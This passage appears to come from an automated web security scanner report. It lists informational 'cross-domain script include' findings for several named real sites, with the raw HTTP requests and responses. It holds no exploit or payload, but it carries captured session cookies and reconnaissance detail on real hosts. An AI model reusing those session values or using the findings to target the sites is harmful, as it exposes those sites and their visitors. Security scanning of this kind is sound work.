Set-Cookie: PHPSESSID=35655162a024a2c7b1ebfebb9b6b03b6; path=/
Set-Cookie: sbmg_footerShowAfter=1; expires=Fri, 11-May-2012 11:02:35 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 22087

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">
<head>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<meta http-equiv="Content-Type" cont
...[SNIP]...
<!-- Begin Catalyst Footer Scripts -->
<script type="text/javascript" src="http://infusionextreme.com/tracker/js/t8ea1977da8b0f1a343c918eec0a87bfb.js"></script>
...[SNIP]...

20.9. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxbusiness/300x250/ros

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2698
Content-Type: text/html
Date: Thu, 12 May 2011 11:39:09 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5271.contextweb.com/B5456322.7;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~533594~3136~56301~119820~96152~3~145~9~foxbusiness.com~2~8~1~0~4~3~c_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk^~49~2~r2lmvJHLrhjp~wOebwAz4UvVv~1~1~1~~;ord=2131773229?">
</SCRIPT>
...[SNIP]...
</iframe>

<script type="text/javascript" src="http://admeld.lucidmedia.com/clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...

20.10. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /topics/reference/timestopics/subjects/p/private_equity/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1; nyt-m=D5A6A596AEC66C101E6FF77DE512588B&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.11.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:15:57 GMT
Content-type: text/html
Set-cookie: adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; expires=Friday, 11-May-2012 11:15:57 GMT; path=/; domain=.nytimes.com
Set-cookie: adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; path=/; domain=.nytimes.com
Cache-Control: private
Content-Length: 70079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Private Equity News
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

20.11. https://webmail.tuckerellis.com/exchweb/bin/auth/owalogon.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://webmail.tuckerellis.com
Path:   /exchweb/bin/auth/owalogon.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /exchweb/bin/auth/owalogon.asp?url=https://webmail.tuckerellis.com/exchange&reason=0 HTTP/1.1
Host: webmail.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://webmail.tuckerellis.com/
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.11.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 8890
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:33:47 GMT


<!-- {57A118C6-2DA9-419d-BE9A-F92B0F9A418B} -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--Copyright (c) 2000-2003 Microsoft Corporation. All rights reserved.-->
<HTML >
...[SNIP]...
<CENTER>
                   <script src=https://seal.verisign.com/getseal?host_name=webmail.tuckerellis.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...

20.12. http://wolfgreenfield.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wolfgreenfield.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:51 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 14193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-eq
...[SNIP]...
<link rel="shortcut icon" href="favicon.ico" />
<script type="text/javascript" src="http://207.56.166.97/javascript/c_config.js"></script>
<script type="text/javascript" src="http://207.56.166.97/javascript/c_smartmenus.js"></script>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

20.13. http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html HTTP/1.1
Host: www.bloomberg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hptest2011time=1303930127; OAX=rcHW8024ZQYADEK+; __utmz=30057196.1303930136.1.1.utmcsr=businessweek.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|26DC3287851D34A3-4000010C2016501C[CE]; profFbannerad=1; prodFbannerad=1; opt=no-opt; __utma=30057196.790518761.1303930135.1303930135.1303930135.1; __utmv=30057196.|3=opt=no-opt=1,; rsi_segs=K05539_10529|K05539_10592; _chartbeat2=05vt53emlalrxzsu

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Vary: Accept-Encoding
ETag: W/"683e1b09b50f1132fee8e0b7794a5e52"
X-runtime: 1022
Content-Type: text/html; charset=utf-8
Proxy-agent: Sun-Java-System-Web-Server/7.0
Cache-Control: private, max-age=356
Date: Thu, 12 May 2011 11:37:04 GMT
Connection: close
Content-Length: 57400


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</script>


<script src="http://cdn.gotraffic.net/v/20110510_141513/javascripts/main_f-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://www.googletagservices.com/tag/static/google_services.js" type="text/javascript"></script>
...[SNIP]...
<li class="linkedin ">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</ul>


<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div id="bloomberg-horizontal-rbox">
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/bloomberg/rbox.js?article"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://static.newstogram.com/bloomberg-v3/js/histogram.js"></script>
...[SNIP]...
</noscript>
<script src="http://cdn.gotraffic.net/v/20110510_141513/javascripts/s_code_p-min.js" type="text/javascript"></script>
<link href="http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_style.css" media="screen" rel="stylesheet" type="text/css" /> <script src="http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_engine_c.js" type="text/javascript"></script> <script src="http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_conf_en-US_inline.js" type="text/javascript"></script>
<script src="http://cdn.gotraffic.net/v/20110510_141513/onlineopinionOO4S/oo_conf_en-US_inline_stories.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=K05539"></script>
...[SNIP]...

20.14. http://www.butlerrubin.com/web/br.nsf/index

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/index

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web/br.nsf/index?openform HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:25 GMT
Last-Modified: Thu, 12 May 2011 12:21:23 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12175
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nation
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.15. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web/br.nsf/web/br.nsf/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.16. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web/br.nsf/web/br.nsf/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.17. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web/br.nsf/web/br.nsf/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.18. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web/br.nsf/web/br.nsf/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.19. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web/br.nsf/web/br.nsf/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:32 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9230
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.20. http://www.carlyle.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carlyle.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.carlyle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 13420
Content-Type: text/html
Content-Location: http://www.carlyle.com/index.html
Last-Modified: Mon, 09 May 2011 16:36:59 GMT
Accept-Ranges: bytes
ETag: "cf5b2d5167ecc1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:41:08 GMT

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta name="Keywords" content=""/>
<meta name="Description" content=""/>
<meta content="no-cache" http-
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.21. http://www.carlyle.com/Contact/item7607.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carlyle.com
Path:   /Contact/item7607.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Contact/item7607.html HTTP/1.1
Host: www.carlyle.com
Proxy-Connection: keep-alive
Referer: http://www.carlyle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=186619067.604400709.1305200382.1305200382.1305200382.1; __utmb=186619067; __utmc=186619067; __utmz=186619067.1305200382.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Length: 26064
Content-Type: text/html
Last-Modified: Mon, 09 May 2011 16:23:34 GMT
Accept-Ranges: bytes
ETag: "67b17c7165ecc1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:41:12 GMT

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta name="Keywords" content=""/>
<meta name="Description" content=""/>
<meta content="no-cache" http-
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.22. http://www.csscorp.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csscorp.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:56:11 GMT
Server: Apache/2.2.12 (Unix)
Set-Cookie: csscorp=173.193.214.243.1305201371350323; path=/; max-age=315360000; domain=.csscorp.com
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Global Information &
...[SNIP]...
</script>-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=csscorp"></script>
...[SNIP]...
</script>
           
           <script src="http://lfov.net/webrecorder/js/listen.js" type="text/Javascript"></script>
...[SNIP]...

20.23. http://www.csscorp.com/contact-us/general-enquiry.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csscorp.com
Path:   /contact-us/general-enquiry.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact-us/general-enquiry.php HTTP/1.1
Host: www.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1; wp1090=UTCTDDDDDDTVYCAU

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:58:17 GMT
Server: Apache/2.2.12 (Unix)
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>General Enquiry -
...[SNIP]...
</script>-->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=csscorp"></script>
...[SNIP]...
</script>
           
           <script src="http://lfov.net/webrecorder/js/listen.js" type="text/Javascript"></script>
...[SNIP]...

20.24. http://www.csscorp.com/page-not-found.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csscorp.com
Path:   /page-not-found.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /page-not-found.php HTTP/1.1
Host: www.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
